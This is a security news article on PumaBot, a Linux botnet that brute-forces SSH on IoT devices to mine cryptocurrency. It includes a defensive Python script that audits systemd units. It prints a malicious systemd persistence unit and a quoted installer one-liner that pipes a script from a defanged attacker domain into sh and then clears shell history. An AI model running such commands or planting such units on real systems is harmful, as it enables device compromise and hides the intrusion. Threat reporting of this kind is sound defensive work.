Tuesday, March 17, 2026

New Linux PumaBot Targets IoT Devices Using SSH Brute-Force Attacks

A newly discovered Linux botnet, dubbed PumaBot, is actively targeting embedded Internet of Things (IoT) devices with remarkable stealth and technical sophistication.

Unlike traditional botnets that indiscriminately scan the internet, PumaBot executes targeted brute-force SSH attacks based on lists retrieved from its command-and-control (C2) infrastructure.

Its focus on persistence, evasion, and cryptocurrency mining marks an escalation in the evolving threat landscape facing IoT ecosystems.

Stealthy Infection Chain and Persistence Tactics

PumaBot’s infection begins with downloading a tailored set of target IP addresses from a remote C2 server.

The malware then attempts to brute-force SSH credentials on devices with open SSH ports, typically using a wordlist or sequence of default passwords.

Upon gaining access, it deploys itself to the device and camouflages its presence by masquerading as a legitimate system binary, often copying itself to /lib/redis and naming it after familiar services.

To ensure it survives reboots and system cleanups, PumaBot abuses systemd service management. It creates deceptive service files such as redis.service or even mysqI.service (spelled with a capital “I” in place of the lowercase “l” so that it mimics the genuine MySQL service):

```ini
# Example of a malicious systemd service file
[Unit]
Description=Redis In-Memory Data Store

[Service]
ExecStart=/lib/redis
Restart=always

[Install]
WantedBy=multi-user.target
```

This service guarantees that the malicious binary is executed automatically when the system starts, enabling long-term access for the attacker.
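The two persistence tricks described above (a look-alike unit name such as mysqI.service and an ExecStart that points at /lib/redis rather than a normal binary directory) can be checked for mechanically. The following script is an added example written for this article, not Darktrace's or PumaBot's code; the list of imitated service names, the trusted binary directories and the sample unit files are assumptions constructed for the demonstration.

```python
# Added example: audit systemd unit files for PumaBot-style persistence.
# Flags (1) unit names that imitate a known service via homoglyphs
# (e.g. "mysqI" with a capital I for "mysql") and (2) ExecStart binaries
# living outside the directories where service binaries normally sit.
from configparser import ConfigParser

# Services the malware is reported to imitate (assumption; extend as needed).
KNOWN_SERVICES = {"redis", "mysql", "mysqld", "mariadb"}
# Where a legitimate ExecStart binary is expected (assumption for this demo).
TRUSTED_BIN_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/",
                    "/usr/local/bin/", "/usr/local/sbin/", "/usr/lib/",
                    "/lib/systemd/", "/usr/libexec/", "/opt/")
# Characters commonly swapped in for look-alike names.
HOMOGLYPHS = str.maketrans({"I": "l", "1": "l", "0": "o"})

def lookalike_of(unit_name):
    """Return the legitimate service a unit name imitates, or None."""
    base = unit_name.removesuffix(".service")
    if base in KNOWN_SERVICES:
        return None  # exact legitimate name, not a homoglyph trick
    folded = base.translate(HOMOGLYPHS).lower()
    return folded if folded in KNOWN_SERVICES else None

def exec_start_path(unit_text):
    """Extract the executable path from a unit file's ExecStart= line."""
    cp = ConfigParser(strict=False, interpolation=None)
    cp.optionxform = str  # keep key case so "ExecStart" matches
    cp.read_string(unit_text)
    cmd = cp.get("Service", "ExecStart", fallback="").strip()
    # Drop systemd's special prefix characters (-, @, +, !, :) if present.
    return cmd.lstrip("-@+!:").split()[0] if cmd else ""

def audit_unit(unit_name, unit_text):
    """Return findings for one unit file; an empty list means nothing suspicious."""
    findings = []
    target = lookalike_of(unit_name)
    if target:
        findings.append(f"name '{unit_name}' looks like the genuine {target}.service")
    path = exec_start_path(unit_text)
    if path and not path.startswith(TRUSTED_BIN_DIRS):
        findings.append(f"ExecStart runs {path} outside the usual binary directories")
    return findings

# Constructed samples: the malicious unit from the article and a benign Redis unit.
SAMPLE_UNITS = {
    "mysqI.service": "[Unit]\nDescription=Redis In-Memory Data Store\n\n[Service]\n"
                     "ExecStart=/lib/redis\nRestart=always\n\n[Install]\nWantedBy=multi-user.target\n",
    "redis.service": "[Unit]\nDescription=Redis\n\n[Service]\n"
                     "ExecStart=/usr/bin/redis-server /etc/redis/redis.conf\n",
}

if __name__ == "__main__":
    for name, text in SAMPLE_UNITS.items():
        for finding in audit_unit(name, text):
            print(f"{name}: {finding}")
```

On a real host the same functions can be run over the files in /etc/systemd/system, which is where an attacker-created unit would normally be dropped.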

Evasion, Surveillance Targeting, and Crypto Mining

A key technical highlight is PumaBot’s advanced fingerprinting and evasion techniques.

Before launching attacks, the malware probes devices for specific strings, such as “Pumatronix”—a known manufacturer of surveillance and traffic camera systems.

This allows PumaBot to either prioritize or avoid specific types of IoT hardware, indicating a tailored approach and an understanding of the IoT landscape.

Upon successful compromise, the botnet collects system information (uname -a is used to gather OS, kernel, and architecture details) and exfiltrates this data to its C2 server in a JSON-encoded payload using custom HTTP headers.

Information such as the device’s IP address, login credentials, and configurations is sent to the attacker, facilitating remote command execution and dynamic campaign management.

PumaBot is primarily monetized through cryptocurrency mining. Commands like xmrig are deployed, leveraging the device’s resources to mine cryptocurrencies illicitly.

Since these commands rarely reference full binary paths, additional payloads are likely fetched from attacker-controlled servers, further expanding the botnet’s capabilities.

Ecosystem of Related Tools

Darktrace analysts uncovered related binaries during their investigation, such as ddaemon (a Go-based backdoor that executes networkxm, another mining payload) and installx.sh, a shell script that automates payload delivery and erases forensic traces by clearing bash history:

```bash
wget http://1.lusyn[.]xyz/installx.sh -O- | sh
history -c
```

These components reveal a modular and extensible attack infrastructure, allowing threat actors to adjust and expand their operations rapidly.

PumaBot’s emergence, marked by its Go-based architecture, strategic SSH brute-forcing, camouflaged persistence methods, and anti-analysis behavior, represents a growing and sophisticated threat to IoT environments, particularly those with weak SSH credentials and limited monitoring.

Security teams are urged to harden SSH, monitor systemd modifications, and deploy IoT-specific defenses to reduce risk from this escalating botnet menace.
